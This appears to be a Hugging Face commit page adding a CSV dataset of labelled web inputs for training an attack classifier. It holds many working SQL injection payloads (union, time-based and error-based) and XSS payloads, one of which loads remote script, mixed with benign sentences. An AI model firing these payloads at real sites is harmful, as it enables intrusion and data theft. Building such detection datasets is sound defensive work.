shengqin commited on
Commit
9f2253e
·
1 Parent(s): e61142d

Upload all_1000.csv

Browse files
Files changed (1) hide show
  1. all_1000.csv +1000 -0
all_1000.csv ADDED
@@ -0,0 +1,1000 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Payload,Label,text_label,ID
2
+ "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",2,SQLi,1
3
+ "1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'dphz' = 'dphz",2,SQLi,2
4
+ "Kohl's: Home Closeout: 60% off select cold-weather bedding, 55% – 65% off select luggage, plus more savings in bed & bath, kitchen & dining, home décor, and furniture (through Feb. 1).",3,normal,3
5
+ "<title onbeforecopy=""alert(1)"" contenteditable>test</title>",1,XSS,4
6
+ <header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus>,1,XSS,5
7
+ "1, ( case when 8260 = 8260 then 1 else null end )",2,SQLi,6
8
+ "1%"" ) ) and sleep ( 5 ) #",2,SQLi,7
9
+ "1"" where 7599 = 7599",2,SQLi,8
10
+ "<div draggable=""true"" contenteditable>drag me</div><li ondrop=alert(1) contenteditable>drop here</li>",1,XSS,9
11
+ "1"" or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ""snht"" = ""snht",2,SQLi,10
12
+ 1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'napi' like 'napi,2,SQLi,11
13
+ -8745' ) as xpwv where 8855 = 8855 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,12
14
+ "-2033"" ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,13
15
+ 1' ) ) as xkiq where 9008 = 9008 and sleep ( 5 ) --,2,SQLi,14
16
+ "-5849 ) union all select 6168,6168,6168,6168,6168,6168,6168,6168#",2,SQLi,15
17
+ "1 ) ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,16
18
+ "1'+ ( select blbd where 7451 = 7451 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,17
19
+ Select the right path.,3,normal,18
20
+ Select the best wedding hairstyle.,3,normal,19
21
+ "1 where 8949 = 8949 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,20
22
+ -8233' or 9538 = 1882#,2,SQLi,21
23
+ "{""id"":null,""name"":""sets""}",3,normal,22
24
+ Each offers a handful of channels in the genre you select.,3,normal,23
25
+ "1"" ) ) as hfma where 2654 = 2654 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,24
26
+ select ( case when ( 6276 = 6276 ) then 6276 else 6276* ( select 6276 from information_schema.character_sets ) end ) #,2,SQLi,25
27
+ Insert your contact information in the form.,3,normal,26
28
+ Save up to 60 percent off on select items at bloomingdales.com.,3,normal,27
29
+ You can always select the crib of your choice and register it at department stores.,3,normal,28
30
+ 1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 'ywbs' = 'ywbs,2,SQLi,29
31
+ "Select one color for the walls, and use the second color in the bedding, wall accents, chair upholstery and window coverings.",3,normal,30
32
+ "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( 'vjdk' like 'vjdk",2,SQLi,31
33
+ "-3828%"" ) ) ) or make_set ( 1765 = 8657,8657 ) and ( ( ( ""%"" = """,2,SQLi,32
34
+ "<kbd draggable=""true"" ondrag=""alert(1)"">test</kbd>",1,XSS,33
35
+ "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></article>",1,XSS,34
36
+ end and ( 'rlux' like 'rlux,2,SQLi,35
37
+ "<style>@keyframes slidein {}</style><nobr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nobr>",1,XSS,36
38
+ <select onpointermove=alert(1)>XSS</select>,1,XSS,37
39
+ "<img \x11src=x onerror=""javascript:alert(1)"">",1,XSS,38
40
+ "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( ""mubt"" = ""mubt",2,SQLi,39
41
+ <plaintext onpointermove=alert(1)>XSS</plaintext>,1,XSS,40
42
+ foo<script>alert(1)</script>,1,XSS,41
43
+ Select businesses in the area will also be offering discounts.,3,normal,42
44
+ "<details ondblclick=""alert(1)"">test</details>",1,XSS,43
45
+ "and (select substring(@@version,3,1))='X'",2,SQLi,44
46
+ ; execute immediate 'sel' || 'ect us' || 'er',2,SQLi,45
47
+ "1%"" ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,46
48
+ 1 ) ) as efjb where 4642 = 4642 order by 1#,2,SQLi,47
49
+ <nobr id=x tabindex=1 onactivate=alert(1)></nobr>,1,XSS,48
50
+ "1'+ ( select 'zxxh' where 4065 = 4065 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,49
51
+ Select arrive.,3,normal,50
52
+ "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) -- vhmc",2,SQLi,51
53
+ "<u draggable=""true"" ondrag=""alert(1)"">test</u>",1,XSS,52
54
+ "-4418"" or 6872 = 6872 and ""gbut"" = ""gbut",2,SQLi,53
55
+ "1', ( select ( case when ( 8640 = 8640 ) then ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null ) ) ) else 8640/ ( select 0 from information_schema.system_users ) end ) from information_schema.system_users ) --",2,SQLi,54
56
+ 1' ) ) and 7230 = 2517,2,SQLi,55
57
+ "-1139 ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,56
58
+ "<style>@keyframes x{}</style><figure style=""animation-name:x"" onanimationend=""alert(1)""></figure>",1,XSS,57
59
+ "<div draggable=""true"" contenteditable>drag me</div><del ondragover=alert(1) contenteditable>drop here</del>",1,XSS,58
60
+ <script src=//brutelogic.com.br/1.js>,1,XSS,59
61
+ "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""yxes"" like ""yxes",2,SQLi,60
62
+ 1 ) ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 4694 = 4694,2,SQLi,61
63
+ Where's the perfect spot to unwind?,3,normal,62
64
+ "1'+ ( select zfpk where 9784 = 9784 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) +'",2,SQLi,63
65
+ "1"" where 9756 = 9756",2,SQLi,64
66
+ "1 ) where 5378 = 5378 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,65
67
+ "1 ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 )",2,SQLi,66
68
+ &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-,1,XSS,67
69
+ "<a onpaste=""alert(1)"" contenteditable>test</a>",1,XSS,68
70
+ 1' ) as gdie where 8133 = 8133 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,69
71
+ "<col onclick=""alert(1)"">test</col>",1,XSS,70
72
+ "<nextid onkeypress=""alert(1)"" contenteditable>test</nextid>",1,XSS,71
73
+ "<meta http-equiv=""refresh"" content=""0; url=//portswigger-labs.net"">",1,XSS,72
74
+ 1'+ ( select ophz where 9158 = 9158 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) ) +',2,SQLi,73
75
+ "<xss draggable=""true"" ondragleave=""alert(1)"" style=display:block>test</xss>",1,XSS,74
76
+ "1%"" ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""%"" = """,2,SQLi,75
77
+ "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) ) ||'",2,SQLi,76
78
+ "1"" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,77
79
+ select ( case when ( 3414 = 8741 ) then 3414 else 3414* ( select 3414 from information_schema.character_sets ) end ) #,2,SQLi,78
80
+ "<style>:target {transform: rotate(180deg);}</style><button id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></button>",1,XSS,79
81
+ "-1647' ) ) union all select 3030,3030,3030,3030,3030,3030,3030--",2,SQLi,80
82
+ <button onMouseWheel=javascript:alert(1)>,1,XSS,81
83
+ <ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby>,1,XSS,82
84
+ Was there a period where we wanted to select dialogue choices?,3,normal,83
85
+ "<legend draggable=""true"" ondragleave=""alert(1)"">test</legend>",1,XSS,84
86
+ I need to select the right outfit for the occasion.,3,normal,85
87
+ Plant a thriving garden.,3,normal,86
88
+ Join the club.,3,normal,87
89
+ "<noscript draggable=""true"" ondragenter=""alert(1)"">test</noscript>",1,XSS,88
90
+ ))%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,89
91
+ Select a movie.,3,normal,90
92
+ "<isindex onkeydown=""alert(1)"" contenteditable>test</isindex>",1,XSS,91
93
+ "<section oncopy=""alert(1)"" contenteditable>test</section>",1,XSS,92
94
+ Let's discuss where to go for our day off.,3,normal,93
95
+ 1'+ ( select ohqr where 5610 = 5610,2,SQLi,94
96
+ 1' ) as zmvn where 2887 = 2887 union all select null--,2,SQLi,95
97
+ "<isindex onmouseover=""alert(1)"">test</isindex>",1,XSS,96
98
+ Select your consider.,3,normal,97
99
+ "<style>@keyframes x{}</style><rtc style=""animation-name:x"" onanimationend=""alert(1)""></rtc>",1,XSS,98
100
+ "1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'kpsg' like 'kpsg",2,SQLi,99
101
+ "<section draggable=""true"" ondragleave=""alert(1)"">test</section>",1,XSS,100
102
+ "<img """"""><script>alert(""XSS by \nxss"")</script><marquee><h1>XSS by xss</h1></marquee>",1,XSS,101
103
+ "{""id"":null,""firstName"":""Star Buy"",""lastName"":""Property"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,102
104
+ 1'|| ( select 'ghby' from dual where 4854 = 4854,2,SQLi,103
105
+ Insert card.,3,normal,104
106
+ "<colgroup onkeypress=""alert(1)"" contenteditable>test</colgroup>",1,XSS,105
107
+ "1' ) ) as ovbz where 3203 = 3203 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,106
108
+ 1%' ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,107
109
+ I want to choose a hairstyle for the event.,3,normal,108
110
+ "<style>:target {color:red;}</style><data id=x style=""transition:color 1s"" ontransitionend=alert(1)></data>",1,XSS,109
111
+ "select * from users where id = '1' + $+*$ union select 1,@@VERSION -- 1'",2,SQLi,110
112
+ "1 ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 4858 = 4858",2,SQLi,111
113
+ /><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />,1,XSS,112
114
+ "1"" ) where 1673 = 1673 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,113
115
+ AnD SLEEP(5) ANd '1,2,SQLi,114
116
+ end and ( ( 2160 = 2160,2,SQLi,115
117
+ The Melting Pot will randomly select a winner on Monday.,3,normal,116
118
+ <dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus>,1,XSS,117
119
+ 1'+ ( select xzvf where 9727 = 9727,2,SQLi,118
120
+ 1 ) where 4548 = 4548 and 9198 = 9198--,2,SQLi,119
121
+ grant,3,normal,120
122
+ "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,121
123
+ "-8971'|| ( select 'smyx' where 7970 = 7970 union all select 7970,7970,7970,7970,7970,7970,7970#",2,SQLi,122
124
+ <shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus>,1,XSS,123
125
+ "-9638 ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( 3679 = 3679",2,SQLi,124
126
+ "1' where 3339 = 3339 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,125
127
+ "<html onmouseout=""alert(1)"">test</html>",1,XSS,126
128
+ ORDER BY 12--,2,SQLi,127
129
+ 1' ) as tqdg where 9355 = 9355,2,SQLi,128
130
+ Select your promise.,3,normal,129
131
+ "1"" union all select null,null,null,null,null,null,null,null,null#",2,SQLi,130
132
+ select ( case when ( 1868 = 5071 ) then 1 else 1868* ( select 1868 from master..sysdatabases ) end ) --,2,SQLi,131
133
+ Here's how I select my seat every time I fly.,3,normal,132
134
+ "Additionally, you can save up to 65% on select sale styles.",3,normal,133
135
+ "1 where 6881 = 6881 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,134
136
+ "-5360' where 8178 = 8178 union all select 8178,8178,8178--",2,SQLi,135
137
+ 1 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) # bkjl,2,SQLi,136
138
+ "-5998"" ) as gazd where 2814 = 2814 union all select 2814,2814,2814,2814,2814,2814,2814--",2,SQLi,137
139
+ -7561 ) as ilrm where 8828 = 8828 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,138
140
+ "<style>@keyframes x{}</style><option style=""animation-name:x"" onanimationend=""alert(1)""></option>",1,XSS,139
141
+ "<tbody onmouseenter=""alert(1)"">test</tbody>",1,XSS,140
142
+ 1'|| ( select 'ifts' from dual where 6329 = 6329,2,SQLi,141
143
+ VICE: How do you select student participants [for the] program?,3,normal,142
144
+ 1' ) and 4822 = 6997 and ( 'ojku' = 'ojku,2,SQLi,143
145
+ <dl id=x tabindex=1 onbeforeactivate=alert(1)></dl>,1,XSS,144
146
+ "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'gpeo' like 'gpeo",2,SQLi,145
147
+ "{""id"":null,""name"":""bell""}",3,normal,146
148
+ --></noscript></noembed></template></title></textarea></style><script>alert()</script>,1,XSS,147
149
+ 1' in boolean mode ) and sleep ( 5 ) #,2,SQLi,148
150
+ "1'|| ( select 'xuou' from dual where 7681 = 7681 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) ) ||'",2,SQLi,149
151
+ <noscript id=x tabindex=1 onactivate=alert(1)></noscript>,1,XSS,150
152
+ "<em onmouseout=""alert(1)"">test</em>",1,XSS,151
153
+ SLEEP(5)--,2,SQLi,152
154
+ Where do you want it?,3,normal,153
155
+ 1 ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 6518 = 6518,2,SQLi,154
156
+ Select your preferred mode of transportation.,3,normal,155
157
+ "<link onmouseenter=""alert(1)"">test</link>",1,XSS,156
158
+ "<meta charset=""mac-farsi"">¼script¾javascript:alert(1)¼/script¾",1,XSS,157
159
+ "{""id"":null,""name"":""Sangloupmon""}",3,normal,158
160
+ "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--",2,SQLi,159
161
+ <article onblur=alert(1) tabindex=1 id=x></article><input autofocus>,1,XSS,160
162
+ "1 union all select null,null--",2,SQLi,161
163
+ <marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee>,1,XSS,162
164
+ "1"" where 7232 = 7232 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,163
165
+ "-1083%"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( ""%"" = """,2,SQLi,164
166
+ <small id=x tabindex=1 onfocusin=alert(1)></small>,1,XSS,165
167
+ "<div draggable=""true"" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable>drop here</dfn>",1,XSS,166
168
+ "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( 'hube' = 'hube",2,SQLi,167
169
+ <ol id=x tabindex=1 onfocus=alert(1)></ol>,1,XSS,168
170
+ ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( 'cbaj' = 'cbaj,2,SQLi,169
171
+ "<object id=""x"" classid=""clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598""></object> <object classid=""clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"" onqt_error=""javascript:alert(1)"" style=""behavior:url(#x);""><param name=postdomevents /></object>",1,XSS,170
172
+ "Available in Playback Mode, the D-Lighting function lets users select images with excessive backlight or insufficient flash.",3,normal,171
173
+ "or x""=""x",2,SQLi,172
174
+ Select the perfect dress for the event.,3,normal,173
175
+ "<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>",1,XSS,174
176
+ <svg onload=alert(1)//,1,XSS,175
177
+ "<dialog onmousemove=""alert(1)"">test</dialog>",1,XSS,176
178
+ <svg////////onload=alert(1)>,1,XSS,177
179
+ 1' ) as mzby where 6530 = 6530,2,SQLi,178
180
+ "1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,179
181
+ "-3749"" or elt ( 1032 = 1032,3623 ) and ""mzrw"" = ""mzrw",2,SQLi,180
182
+ Select bike.,3,normal,181
183
+ Just select the Amazon Music Unlimited option before checking out.,3,normal,182
184
+ "{""id"":null,""name"":""tail""}",3,normal,183
185
+ Delete outdated files from the directory.,3,normal,184
186
+ <command onblur=alert(1) tabindex=1 id=x></command><input autofocus>,1,XSS,185
187
+ "<style>@keyframes x{}</style><tt style=""animation-name:x"" onanimationend=""alert(1)""></tt>",1,XSS,186
188
+ "&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\""XSS\"")&gt;",1,XSS,187
189
+ "1 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,188
190
+ "<fieldset onkeyup=""alert(1)"" contenteditable>test</fieldset>",1,XSS,189
191
+ Where's your SQL documentation?,3,normal,190
192
+ "1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'zpzf' = 'zpzf",2,SQLi,191
193
+ 1' where 2134 = 2134 rlike ( select ( case when ( 3613 = 2090 ) then 1 else 0x28 end ) ) --,2,SQLi,192
194
+ <xss onpointerout=alert(1) style=display:block>XSS</xss>,1,XSS,193
195
+ "1 ) ) as hgtl where 3864 = 3864 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,194
196
+ "-2418'|| ( select 'mdbt' from dual where 3026 = 3026 union all select 3026,3026,3026,3026,3026,3026,3026,3026,3026--",2,SQLi,195
197
+ Select help.,3,normal,196
198
+ "select * from generate_series ( 7724,7724,case when ( 7724 = 8170 ) then 1 else 0 end ) limit 1--",2,SQLi,197
199
+ Filter results.,3,normal,198
200
+ <optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup>,1,XSS,199
201
+ "1"" ) ) as femc where 1313 = 1313 and 4595 = 4595#",2,SQLi,200
202
+ "<dd draggable=""true"" ondragleave=""alert(1)"">test</dd>",1,XSS,201
203
+ "-3852' ) union all select 3577,3577,3577,3577,3577,3577,3577,3577#",2,SQLi,202
204
+ Select now.,3,normal,203
205
+ "<div draggable=""true"" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template>",1,XSS,204
206
+ Select your favorite.,3,normal,205
207
+ <textarea onpointerdown=alert(1)>XSS</textarea>,1,XSS,206
208
+ 1' ) ) ) and 2006 = 2006,2,SQLi,207
209
+ "{""id"":null,""firstName"":""Wong"",""lastName"":""Qun Jie"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,208
210
+ &lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;,1,XSS,209
211
+ &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,210
212
+ "{""id"":null,""name"":""major continued""}",3,normal,211
213
+ "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></ol>",1,XSS,212
214
+ "<style>:target {color:red;}</style><area id=x style=""transition:color 1s"" ontransitionend=alert(1)></area>",1,XSS,213
215
+ "select * from users where id = 1 or "" ( &"" or 1 = 1 -- 1",2,SQLi,214
216
+ She'll select her shoes.,3,normal,215
217
+ Where's the airport?,3,normal,216
218
+ Select a destination for the trip.,3,normal,217
219
+ "Get 30 percent off select fashion items including, shirts, handbags, and more, up to 40 percent off select jewelry, and up to 50 percent off select sneakers and activewear all week long from Amazon's Cyber Week deals.",3,normal,218
220
+ Let's decide where to go for a leisurely walk.,3,normal,219
221
+ "The same son also published an edition of Paulding's Select Works (4 vols., 1867-1868), and a biography called.",3,normal,220
222
+ "<style>@keyframes x{}</style><s style=""animation-name:x"" onanimationstart=""alert(1)""></s>",1,XSS,221
223
+ <<SCRIPT>alert(�XSS�);//<</SCRIPT>,1,XSS,222
224
+ <sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus>,1,XSS,223
225
+ -9446 ) ) as wmrq where 3705 = 3705 union all select 3705#,2,SQLi,224
226
+ "<th draggable=""true"" ondrag=""alert(1)"">test</th>",1,XSS,225
227
+ "<optgroup draggable=""true"" ondragend=""alert(1)"">test</optgroup>",1,XSS,226
228
+ Filter the bright photos.,3,normal,227
229
+ "<image src=""javascript:alert(2)""> // IE6, O10.10↓, OM10.0↓",1,XSS,228
230
+ "1%' ) union all select null,null--",2,SQLi,229
231
+ select case when 6229 = 2077 then 1 else null end--,2,SQLi,230
232
+ The key is to select a name that is catchy and instantly memorable for customers yet avoids all the legal pitfalls in this area.,3,normal,231
233
+ "1%"" ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ""%"" = """,2,SQLi,232
234
+ "-3102 ) union all select 6707,6707,6707,6707--",2,SQLi,233
235
